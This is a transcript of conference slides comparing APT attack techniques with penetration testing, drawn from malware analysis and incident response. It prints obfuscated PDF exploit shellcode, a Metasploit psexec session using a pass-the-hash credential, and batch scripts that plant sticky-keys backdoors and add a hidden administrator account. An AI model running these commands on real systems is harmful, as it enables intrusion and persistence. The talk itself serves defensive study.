evolution of pentesting - countermeasure 2019€¦ · evolution • what is this talk? – a...
TRANSCRIPT
![Page 1: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/1.jpg)
11
Evolution of PenTesting
![Page 2: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/2.jpg)
22
Introduction
• Name: Russ Gideon
• Title: Director of Malware Research
• Contact: [email protected]
• Twitter: @gideonsecurity
• Background:
– Led numerous Red Teams
– Foreign attack profiling and reverse engineering
– Recent work in integration of malware and attack profiling attributes in Attack Research penetration testing
![Page 3: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/3.jpg)
33
Evolution
• What is this talk?
– A dissection of real world attacks and some of its
affects on penetration testing.
– Reflection on real offensive operators vs
penetration testers
– Conclusions are derived from mainly a
forensics/binary analysis perspective
• What this talk is not!
– A slam on current penetration testing tools!
![Page 4: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/4.jpg)
44
Evolution
• 1960s discussions about Time Sharing
computers being vulnerable
– RAND Corporation
– NSA
• Coined the term “penetration” for this
• Evolved into Tiger Teams
• From a historical perspective influential
people in this
– Willis Ware
![Page 5: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/5.jpg)
55
The Birth Of an Industry
Industry realized we need to
behave like attackers to learn
how to defend against them
Henceforth the industry we
all know and love is born
![Page 6: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/6.jpg)
66
Evolution Of an Industry
• Industry gets bigger
• Tools become a commodity
• Attackers evolved and changed tactics
– Employed varying degrees of malware
– Deception
– Leverage protocol and design flaws
– Evasion and anti-analysis techniques
• The industry tools also evolved, but not in the
same manner
![Page 7: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/7.jpg)
77
Memory corruption == $$$
• Tools become commodity
• The shift begins
• Attackers are closed source and don’t release
![Page 8: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/8.jpg)
88
We Make Strange Bedfellows
![Page 9: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/9.jpg)
99
Offensive Operators
![Page 10: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/10.jpg)
1010
Why do we call it APT?
• “APT” != Advanced
• Clever != Advanced
• Attackers work as hard as they have to but not
any harder
– As we step up the defense game they have to
work harder
– Currently that game is not too difficult (in most
places)
![Page 11: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/11.jpg)
1111
Outline
• Getting In
• APT Lateral Movement vs Pentesters Lateral
Movement
• Staging The Attack
![Page 12: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/12.jpg)
1212
Getting In – Spear Phishing
![Page 13: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/13.jpg)
1313
Getting In
• Example
– CVE 2010-2883
• Stack-based buffer overflow in CoolType.dll
• Very popular for targeted spear phishing
• 22 unique samples with this exploit in them
– 7 of these samples are made with metasploit’s module for this
– Case study
• Targeted Attack With a PDF
– D4169301AFBC86A04135EBC4A6A4BAD.pdf
![Page 14: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/14.jpg)
1414
Getting In
• Metasploit has a great module for 2010-2883
• If a host isn’t vulnerable then it will drop and
open a clean “Hello World” PDF
![Page 15: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/15.jpg)
1515
Getting In
• D4169301AFBC86A04135EBC4A6A4BADB.pdf
• Includes this data stream
• Look familiar?
![Page 16: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/16.jpg)
1616
Getting In
• The shellcode is the only significant difference
between the “APT” sample and a general
metasploit created PDF
![Page 17: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/17.jpg)
1717
Getting In
WjozzFaiSj = unescape
var nXzaRHPbywaqAbGpGx0t0zGkvQWhu =
“\x25\x754141\x25\x754141%63a5%u4a80\0x25
snip….. 0x75fa65%uec10%u0937%ufb0c%ufd97…….snip
…%ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uae
f2"
![Page 18: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/18.jpg)
18
Using MSF DEP/ASLR Bypass
seg000:00000136 db 84hseg000:00000137 db 4Ah ; seg000:00000138 db 92h ; seg000:00000139 db 0B6hseg000:0000013A db 80h ; seg000:0000013B db 4Ahseg000:0000013C db 0FFhseg000:0000013D db 0FFhseg000:0000013E db 0FFhseg000:0000013F db 0FFhseg000:00000140 db 0FFhseg000:00000141 db 0FFhseg000:00000142 db 0FFhseg000:00000143 db 0FFhseg000:00000144 db 0FFhseg000:00000145 db 0FFhseg000:00000146 db 0FFhseg000:00000147 db 0FFhseg000:00000148 db 0seg000:00000149 db 10hseg000:0000014A db 0seg000:0000014B db 0
seg000:00000136 db 84hseg000:00000137 db 4Ah ; seg000:00000138 db 92h ; seg000:00000139 db 0B6hseg000:0000013A db 80h ; seg000:0000013B db 4Ahseg000:0000013C db 0FFhseg000:0000013D db 0FFhseg000:0000013E db 0FFhseg000:0000013F db 0FFhseg000:00000140 db 0FFhseg000:00000141 db 0FFhseg000:00000142 db 0FFhseg000:00000143 db 0FFhseg000:00000144 db 0FFhseg000:00000145 db 0FFhseg000:00000146 db 0FFhseg000:00000147 db 0FFhseg000:00000148 db 0seg000:00000149 db 10hseg000:0000014A db 0seg000:0000014B db 0
MSF Created PDF APT Created PDF with MSF
![Page 19: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/19.jpg)
19
Side Note
• The original sample from contagio– Dropper is igfxver.exe
– AV family of Chifrax
• D4169301AFBC86A04135EBC4A6A4BADB.pdf– Dropper is AcroRd32.exe in temp
– %TEMP%\AcroRd32.exe drops and starts
• rundll32.exe "C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11
– AV Family of Protux
– Delivered ~2 weeks later
![Page 20: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/20.jpg)
2020
Getting In Conclusion
• Pen Tester: SingTable CoolType DLL Overflow MSF Module with PDF dropper. – Not a white hat based disclosure
– Originally found in a targeted campaign
• http://contagiodump.blogspot.com/search/label/CVE-2010-2883
• Attacker: Rip off MSF Module
– This attack used the metasploit module
– Change out shellcode
• Added obfuscation
• Verdict: Attacker rips off another attackers tactic and makes it better
![Page 21: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/21.jpg)
2121
Outline
• Getting In
• APT Lateral Movement vs Pen Testers Lateral
Movement
• Staging The Attack
![Page 22: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/22.jpg)
2222
Lateral Movement
![Page 23: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/23.jpg)
2323
APT Lateral Movement
• Case Study:
a1765a7f3376c76d8c23766a92f1cb6b.exe
– Nps.exe
• Sample from IR we conducted
• In a nutshell their own PSEXEC for shoveling
shells
![Page 24: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/24.jpg)
2424
Lateral Movement
• General flow of the sample
– From controlling node
• Execute: nps.exe –install $Victim NPServer
• Drops nps.exe on \\victim\Admin$\system32
• Creates a service around nps.exe (named NPServer) on
remote server and starts it
• Named pipes created on victim host and used for
communications
– NPStdin
– NPStdout
![Page 25: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/25.jpg)
2525
Lateral Movment
• Based upon arguments it is a service binary or
drops the communication piece on the remote
host
![Page 26: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/26.jpg)
2626
Lateral Movement
• Dropper to the victim
![Page 27: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/27.jpg)
2727
Lateral Movement
• Remote Named pipes for all communications
Controlling host
Victim Host
![Page 28: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/28.jpg)
2828
Lateral Movement
• Taking advantage of credential authorization
• Of course won’t work in all situations
– Account needs to have administrative privileges
– Vista and up
• Credentials have to be domain based
• Local administrative credentials can’t write to C$ and
Admin$
![Page 29: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/29.jpg)
2929
Forensic Evidence
![Page 30: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/30.jpg)
3030
Forensic Evidence
![Page 31: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/31.jpg)
3131
Pen Testers Forensic Evidence
• Metasploit has the same capability with
PSEXEC
• General flow
– Pushes service executable with payload to
\\victim\Admin$\system32
– Uses DCERPC to create a service around the
service binary on victim host
– Starts the service on the victim
– Uses payload defined variables for communication
![Page 32: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/32.jpg)
3232
Pen Testers Forensic Evidence
![Page 33: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/33.jpg)
3333
Pen Testers Forensic Evidence
![Page 34: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/34.jpg)
3434
Usage
![Page 35: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/35.jpg)
3535
Usage• msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
![Page 36: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/36.jpg)
3636
Major Differences!
• NPS.exe usage screen. Shows flexibility to alter
your forensic evidence
• Metasploit doesn’t have this capability
• Derives its service name and display name
from 2 pieces of code in the module
– Service name generation looks like
• servicename = rand_text_alpha(8)
– Display name generation looks like:
• displayname = 'M' + rand_text_alpha(rand(32)+1)
![Page 37: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/37.jpg)
3737
Major Differences
• Not Blending in!
– rand_text_alpha(8)
– 'M' + rand_text_alpha(rand(32)+1)
![Page 38: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/38.jpg)
3838
Lateral Movement Solution
• A few lines added to the psexec module and
we have some flexibility now
– Register two new options
• SVCName
– The Service name you want to use. This will be what is left
over in the registry under HKLM\CurrentControlSet\services if
the service is not cleaned up
• DisplayName
– This is the display name of the service that will show up in the
event logs
![Page 39: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/39.jpg)
3939
Lateral Movement Solution
• psexec_ar optionsmsf exploit(psexec_ar) > set DisplayName NPServer
msf exploit(psexec_ar) > set RHOST victim
msf exploit(psexec_ar) > set SMBDomain ""
msf exploit(psexec_ar) > set SMBUser Administrator
msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586
msf exploit(psexec_ar) > set SVCName NPServer
msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe
msf exploit(psexec_ar) > set EXE::Custom mycustom.exe
msf exploit(psexec_ar) > exploit
![Page 40: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/40.jpg)
4040
Lateral Movement Solution
![Page 41: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/41.jpg)
4141
Lateral Movement Solution
Available on GitHub
https://github.com/AttackResearch/Metasploit/blob/master/modules/exploits/psexec_ar.rb
![Page 42: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/42.jpg)
4242
Lateral Movement Conclusion
• Pen Tester: MSF Psexec module
– Randomized service names
– Obvious “badness”
– Very loud
• Attacker: Custom psexec type functionality
– Blend in and look normal
– Uses named pipes for communication
– Very basic backdoor that still isn't caught by AV
• Verdict: Superior attacker technique, less likely to get caught
![Page 43: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/43.jpg)
4343
Outline
• Getting In
• APT Lateral Movement vs Pen Testers Lateral
Movement
• Staging The Attack
![Page 44: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/44.jpg)
4444
Staging The Attack
![Page 45: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/45.jpg)
4545
Staging The Attack
• Automation is the key
• Humans make mistakes
• Automate the post exploitation
– Sounds “advanced” doesn’t it?
![Page 46: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/46.jpg)
4646
Why Raise The Bar?
• Found on various C2 hosts and on the victims
– MM.exe
• Simple automation of their attack
– Helps them for speed
– Helps us with being able know how they will
operate in environments next time
• Rar files aren’t just for exfiltration
![Page 47: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/47.jpg)
4747
Why Raise The Bar?
• Dissection of mm.exe
– Self executing rar file
– Drops 2.bat and mm.exe in C:\Temp
– C:\Temp\mm.exe isn’t the same as the original
mm.exe
• New mm.exe
• Another UPX packed SFX
– Drops 22.bat and net1.exe in C:\Temp
![Page 48: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/48.jpg)
4848
Why Raise The Bar?
• 2.bat
copy %windir%\explorer.exe %windir%\system32\explorer1.exe
copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe
copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe
copy c:\temp\mm.exe %windir%\system32\magnify1.exe
del %windir%\system32\sethc.exe
del %windir%\system32\magnify.exe
c:
cd %windir%\system32\
ren explorer1.exe sethc.exe
ren magnify1.exe magnify.exe
![Page 49: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/49.jpg)
4949
Why Raise The Bar?
• 22.bat
• Now they have
c:\temp\net1.exe user syslem$ /active:y
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add
c:\temp\net1.exe localgroup Administrators syslem$ /add
Persistence Communications
![Page 50: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/50.jpg)
5050
Before and After
![Page 51: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/51.jpg)
5151
Why Raise The Bar?
• Build the SFX RAR file
– Rar.exe a -sfxDefault.sfx -zsettings.conf mm2.exe
mm.exe 2.bat
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=2.bat
Settings.conf
![Page 52: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/52.jpg)
5252
Why Raise The Bar?
• Build the SFX RAR file
– Rar.exe a -sfxDefault.sfx –zsettings1.conf mm.exe
C:\Windows\System32\net1.exe 22.bat
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=22.bat
Settings1.conf
![Page 53: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/53.jpg)
5353
Staging The Attack Conclusion
• Pen Tester: Possible MSF Module
– There really isn’t a tool comparison
– Make a metasploit module for this?
– Working harder than have to?
• Attacker: Attack Process is Automated
– No need for a complex framework
– Works into attackers tool set
– Leverage system resources and that is it
• Verdict: Attacker technique is simple and effective. Doesn’t work harder than has to
![Page 54: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/54.jpg)
5454
Conclusions
• Every attack (and group/person) has its
characteristics as do pen testers
• The objectives of a pen tester are usually
much different than an nation state operator
or black hat
– Pen tests have a tone of constraints
– Pen testers are there to test for vulnerabilities
• Which is needed
– This is not testing the system as a whole
• How does your system react to a true compromise
![Page 55: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/55.jpg)
5555
Conclusions
• Testing the system as whole
– Targeted attacks affect the whole system
– Penetration testing really just looks for vulnerabilities
• We have corrupted the term “penetration tests”
– Pen Test = 20K cheap scan and assessment
• Attack Modeling and Simulations aren’t the same as a our current definition of penetration tests
![Page 56: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/56.jpg)
5656
Attack Simulations and Modeling
• Testing the system as whole:
– Monitoring
– Triage process
– Incident Response process
• Your operations and your vendors
– Business con-ops
– Disaster recovery
• If you pull the plug on your network you are in disaster
recovery!
![Page 57: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/57.jpg)
5757
Attack Simulations: Case Study
![Page 58: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/58.jpg)
5858
Attack Simulations
• What’s the difference between a fire inspector and a fireman?
• Fire inspectors are hired to => Inspect
– Exit lights are working
– Fire alarms are working
– Fire extinguishers are up to par
• Fireman are hired to => Respond
– Fires
– Medical emergencies
– Large scale disasters
![Page 59: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/59.jpg)
5959
Attack Simulations• Do not have your incident response capability behave
as fire inspectors
• They are needed to respond not inspect
• We must start training the IR capability – More than just penetration testing of them
• What are firemen doing while they are “down”?– Training
• Is your IR team technically capable of handling an incident– Revere Engineering
– PCAP Analysis
– Log mining
• Does the business know how to use them
![Page 60: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/60.jpg)
6060
Attack Simulations
• You might not be ready for a full stress test of your environment
• Engage someone that has done this work and see what they can do.
• More than likely there is a lot they can do with and for you
– Testing your NOC/IR Ops
– Testing your detection tools/capabilities
– Modeling attacker workflows and how it relates to your data
![Page 61: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/61.jpg)
6161
Questions?